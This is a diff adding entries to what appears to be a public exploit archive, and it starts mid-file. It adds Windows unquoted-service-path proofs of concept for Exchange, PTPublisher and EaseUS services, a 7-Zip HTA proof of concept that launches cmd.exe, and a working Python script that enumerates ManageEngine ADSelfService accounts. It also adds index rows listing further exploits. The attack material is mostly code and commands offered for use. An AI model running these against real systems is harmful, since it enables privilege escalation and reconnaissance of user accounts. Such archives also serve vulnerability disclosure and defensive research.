+        NOME_VISUALIZZATO         : Microsoft Exchange Mailbox Assistants
+        DIPENDENZE                :
+        SERVICE_START_NAME : LocalSystem

exploits/windows/local/50868.txt

@@ -0,0 +1,23 @@
+# Exploit Title: Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path
+# Exploit Author: Antonio Cuomo (arkantolo)
+# Exploit Date: 2022-04-11
+# Vendor : Microsoft
+# Version : 15.0.847.40
+# Tested on OS: Microsoft Exchange Server 2013 SP1
+
+#PoC :
+==============
+
+C:\>sc qc MSExchangeADTopology
+[SC] QueryServiceConfig OPERAZIONI RIUSCITE
+
+NOME_SERVIZIO: MSExchangeADTopology
+        TIPO                      : 10  WIN32_OWN_PROCESS
+        TIPO_AVVIO                : 2   AUTO_START
+        CONTROLLO_ERRORE          : 1   NORMAL
+        NOME_PERCORSO_BINARIO     : C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft.Exchange.Directory.TopologyService.exe
+        GRUPPO_ORDINE_CARICAMENTO :
+        TAG                       : 0
+        NOME_VISUALIZZATO         : Microsoft Exchange Active Directory Topology
+        DIPENDENZE                :
+        SERVICE_START_NAME : LocalSystem

exploits/windows/local/50883.txt

@@ -0,0 +1,22 @@
+# Exploit Title: 7-zip - Code Execution / Local Privilege Escalation
+# Exploit Author:  Kağan Çapar
+# Date: 2020-04-12
+# Vendor homepage: https://www.7-zip.org/
+# Software link: https://www.7-zip.org/a/7z2107-x64.msi
+# Version: 21.07 and all versions
+# Tested On: Windows 10 Pro (x64)
+# References: https://github.com/kagancapar/CVE-2022-29072
+
+# About:
+7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area.
+
+# Proof of Concept:
+<html>
+<head>
+<HTA:APPLICATION ID="7zipcodeexec">
+<script language="jscript">
+var c = "cmd.exe";
+new ActiveXObject('WScript.Shell').Run(c);
+</script>
+<head>
+<html>

exploits/windows/local/50885.txt

@@ -0,0 +1,37 @@
+# Exploit Title: PTPublisher v2.3.4 - Unquoted Service Path
+# Discovery by: bios
+# Discovery Date: 2022-18-04
+# Vendor Homepage: https://www.primera.com/
+# Tested Version: 2.3.4
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Microsoft Windows 10 Pro x64
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+PTProtect
+        PTProtect
+C:\Program Files (x86)\Primera
+Technology\PTPublisher\UsbFlashDongleService.exe
+                      Auto
+
+C:\>sc qc PTProtect
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: PTProtect
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\PrimeraTechnology\PTPublisher\UsbFlashDongleService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : PTProtect
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\>systeminfo
+
+Host Name:                 DESKTOP-OUHAB1I
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.19044 N/A Build 19044

exploits/windows/local/50886.txt

@@ -0,0 +1,35 @@
+# Exploit Title: EaseUS Data Recovery - 'ensserver.exe'  Unquoted Service Path
+# Discovery by: bios
+# Discovery Date: 2022-18-04
+# Vendor Homepage: https://www.easeus.com/
+# Tested Version: 15.1.0.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Microsoft Windows 10 Pro x64
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto
+| findstr /i /v "C:\Windows\\" | findstr /i /v """
+EaseUS UPDATE SERVICE
+        EaseUS UPDATE SERVICE                     C:\Program Files
+(x86)\EaseUS\ENS\ensserver.exe                                          Auto
+
+C:\>sc qc "EaseUS UPDATE SERVICE"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: EaseUS UPDATE SERVICE
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\EaseUS\ENS\ensserver.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : EaseUS UPDATE SERVICE
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\>systeminfo
+
+Host Name:                 DESKTOP-HR3T34O
+OS Name:                   Microsoft Windows 10 Home
+OS Version:                10.0.19042 N/A Build 19042

exploits/windows/remote/50873.py

@@ -0,0 +1,63 @@
+# Exploit Title: ManageEngine ADSelfService Plus 6.1 - User Enumeration
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://www.manageengine.com/
+# Software Link: https://www.manageengine.com/products/self-service-password/download.html
+# Version: ADSelfService 6.1 Build 6121
+# Tested Against: Build 6118 - 6121
+# Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
+
+# !/usr/bin/python3
+import requests
+import sys
+import time
+import urllib3
+from urllib3.exceptions import InsecureRequestWarning
+
+"""
+The domain users can be enumerated like userenum module of the kerbrute tool using this exploit.
+If you conducted a brute-force attack against a user, please run the script after 30 minutes (default settings) otherwise the results can be false positive.
+"""
+
+def request(target, user):
+    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+    url = target + 'ServletAPI/accounts/login'
+    data = {"loginName": user}
+    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"}
+    req = requests.post(url, data=data, headers=headers, verify=False)
+
+    # For debugging
+    # print("[*] Response for " + user + ": " + req.text.strip())
+    if 'PASSWORD' in req.text:
+        print("[+] " + user + " is VALID!")
+    elif 'Your account has been disabled' in req.text:
+        print("[+] " + user + " account has been DISABLED.")
+    elif 'Your account has expired' in req.text:
+        print("[+] " + user + " account has EXPIRED.")
+    elif 'Enter the text as shown in the image.' in req.text:
+        print("[!] The exploit doesn't detect expired and disabled users. Please, run it after the 30 minutes. ")
+    elif 'Permission Denied.' in req.text:
+        print("[-] " + user + " is not found.")
+
+
+def get_users(target, file):
+    try:
+        file = open(file, "r")
+        for line in file:
+            line = line.strip()
+            time.sleep(0.5)
+            request(target, user=line)
+    except FileNotFoundError:
+        print("[-] File not found!")
+        sys.exit(1)
+
+
+def main(args):
+    if len(args) != 3:
+        print("[*] Usage: %s url usernames_file" % (args[0]))
+        print("[*] Example: %s https://target/ /tmp/usernames.txt" % (args[0]))
+        sys.exit(1)
+    get_users(target=args[1], file=args[2])
+
+
+if __name__ == "__main__":
+    main(args=sys.argv)

files_exploits.csv

@@ -11477,6 +11477,11 @@ id,file,description,date,author,type,platform,port
 50852,exploits/windows/local/50852.txt,"Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path",1970-01-01,"Manthan Chhabra",local,windows,
 50858,exploits/linux/local/50858.txt,"binutils 2.37 - Objdump Segmentation Fault",1970-01-01,"Marlon Petry",local,linux,
 50859,exploits/windows/local/50859.txt,"MiniTool Partition Wizard - Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
+50867,exploits/windows/local/50867.txt,"Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
+50868,exploits/windows/local/50868.txt,"Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
+50883,exploits/windows/local/50883.txt,"7-zip - Code Execution / Local Privilege Escalation",1970-01-01,"Kağan Çapar",local,windows,
+50885,exploits/windows/local/50885.txt,"PTPublisher v2.3.4 - Unquoted Service Path",1970-01-01,bios,local,windows,
+50886,exploits/windows/local/50886.txt,"EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path",1970-01-01,bios,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18664,6 +18669,12 @@ id,file,description,date,author,type,platform,port
 50856,exploits/hardware/remote/50856.py,"Kramer VIAware - Remote Code Execution (RCE) (Root)",1970-01-01,sharkmoos,remote,hardware,
 50857,exploits/multiple/remote/50857.txt,"Opmon 9.11 - Cross-site Scripting",1970-01-01,"Marlon Petry",remote,multiple,
 50861,exploits/linux/remote/50861.txt,"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)",1970-01-01,"Momen Eldawakhly",remote,linux,
+50870,exploits/hardware/remote/50870.txt,"Zyxel NWA-1100-NH - Command Injection",1970-01-01,"Ahmed Alroky",remote,hardware,
+50873,exploits/windows/remote/50873.py,"ManageEngine ADSelfService Plus 6.1 - User Enumeration",1970-01-01,"Metin Yunus Kandemir",remote,windows,
+50875,exploits/hardware/remote/50875.txt,"Verizon 4G LTE Network Extender - Weak Credentials Algorithm",1970-01-01,LiquidWorm,remote,hardware,
+50878,exploits/hardware/remote/50878.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,remote,hardware,
+50879,exploits/hardware/remote/50879.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,remote,hardware,
+50880,exploits/hardware/remote/50880.txt,"Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure",1970-01-01,LiquidWorm,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44710,6 +44721,7 @@ id,file,description,date,author,type,platform,port
 50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"İlhami Selamet",webapps,php,
 50509,exploits/hardware/webapps/50509.txt,"YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)",1970-01-01,tahaafarooq,webapps,hardware,
 50512,exploits/multiple/webapps/50512.py,"Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)",1970-01-01,"Valentin Lobstein",webapps,multiple,
+50872,exploits/php/webapps/50872.txt,"Scriptcase 9.7 - Remote Code Execution (RCE)",1970-01-01,luckyt0mat0,webapps,php,
 50513,exploits/multiple/webapps/50513.py,"FormaLMS 2.4.4 - Authentication Bypass",1970-01-01,"Cristian \'void\' Giustini",webapps,multiple,
 50514,exploits/php/webapps/50514.txt,"WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
 50515,exploits/php/webapps/50515.txt,"WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
@@ -44933,3 +44945,11 @@ id,file,description,date,author,type,platform,port
 50863,exploits/hardware/webapps/50863.txt,"Telesquare TLR-2855KS6 - Arbitrary File Deletion",1970-01-01,"Momen Eldawakhly",webapps,hardware,
 50864,exploits/hardware/webapps/50864.txt,"Razer Sila - Local File Inclusion (LFI)",1970-01-01,"Kevin Randall",webapps,hardware,
 50865,exploits/hardware/webapps/50865.txt,"Razer Sila - Command Injection",1970-01-01,"Kevin Randall",webapps,hardware,
+50869,exploits/php/webapps/50869.txt,"WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection",1970-01-01,"Mohsen Dehghani",webapps,php,
+50871,exploits/php/webapps/50871.rb,"Easy Appointments 1.4.2 - Information Disclosure",1970-01-01,"Alexandre ZANNI",webapps,php,
+50874,exploits/php/webapps/50874.txt,"WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)",1970-01-01,UnD3sc0n0c1d0,webapps,php,
+50876,exploits/php/webapps/50876.txt,"WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated)",1970-01-01,"Roel van Beurden",webapps,php,
+50877,exploits/php/webapps/50877.txt,"REDCap 11.3.9 - Stored Cross Site Scripting",1970-01-01,"Kendrick Lam",webapps,php,
+50881,exploits/php/webapps/50881.txt,"PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)",1970-01-01,"Hemant Kashyap",webapps,php,
+50882,exploits/php/webapps/50882.py,"WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,AkuCyberSec,webapps,php,
+50884,exploits/php/webapps/50884.txt,"Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Ali J",webapps,php,